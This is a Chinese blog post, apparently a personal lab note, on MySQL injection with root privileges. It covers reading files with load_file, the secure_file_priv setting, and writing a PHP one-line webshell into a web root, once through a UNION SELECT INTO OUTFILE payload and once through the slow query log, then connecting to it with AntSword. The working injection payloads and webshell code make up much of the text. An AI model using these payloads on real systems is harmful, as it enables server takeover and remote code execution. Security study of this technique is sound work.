sql 读写注入

root高权限读写注入

load_file 读取文件

大姐我真是整了半天都是nullnullnull缝子

结果看了半天这个my.ini是被隐藏的大哥

load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客

终于读出来了

此时参数值系统变量 secure_file_priv已经被修改

原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。

这个变量就可以用来限制操作路径

into_outfile 写入文件

?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+

我们可以看到2.txt被写入

我们可以写入一句话木马

复制代码
?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+

先检查一下是否上传成功

用蚁剑发现连接成功了v

太搞笑了连接自己

那么如果把my.ini内的参数secure_file_priv设置在c盘目录下

复制代码
secure_file_priv=c:/

我们可以发现我们就只能在c盘进行操作

mysql写马

set global slow_query_log=1;

set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'

D:\\phpstudy_pro\\WWW\d.php---------》shell路径

可以看到有了d.php

复制代码
select '<?php eval($ POST[a])?>' or SLEEP(1);

但是!!!

我发现如果sleep的少,并不会记录到日志中去

要sleep的久一点

Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户

复制代码
select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);

可以看一下我们的日志d.php

因为尝试了很多次。。所以有很多

我们可以发现都是sleep(11)的被记录了

蚁剑连一下看看

相关推荐
合方圆~小文4 小时前
AI摄像头精准识别技术依赖于深度算法
数据结构·数据库·数码相机·模块测试
tanxiaomi4 小时前
Redis相关面试题
数据库·redis·缓存
Controller-Inversion4 小时前
岛屿问题(dfs典型问题求解)
java·算法·深度优先
钮钴禄·爱因斯晨4 小时前
【探索实战】KuratorGitOps 多环境配置管理与合规审计
数据库
okseekw4 小时前
Java 字符串三巨头:String、StringBuilder、StringJoiner —— 初学者避坑指南 🤯
java
Z***G4795 小时前
【零基础学Mysql】常用函数讲解,提升数据操作效率的利器
数据库·mysql
q***06475 小时前
Spring Boot 从 2.7.x 升级到 3.3注意事项
数据库·hive·spring boot
毕设源码余学姐5 小时前
计算机毕设 java 中医药药材分类采购网站 SSM 框架药材交易平台 Java 开发的分类采购与订单管理系统
java·开发语言·课程设计
BD_Marathon5 小时前
【JUC】并发与并行
java
aml258__5 小时前
MySQL 数据库管理入门:从创建到删除(T1)
数据库·mysql·oracle·初学数据库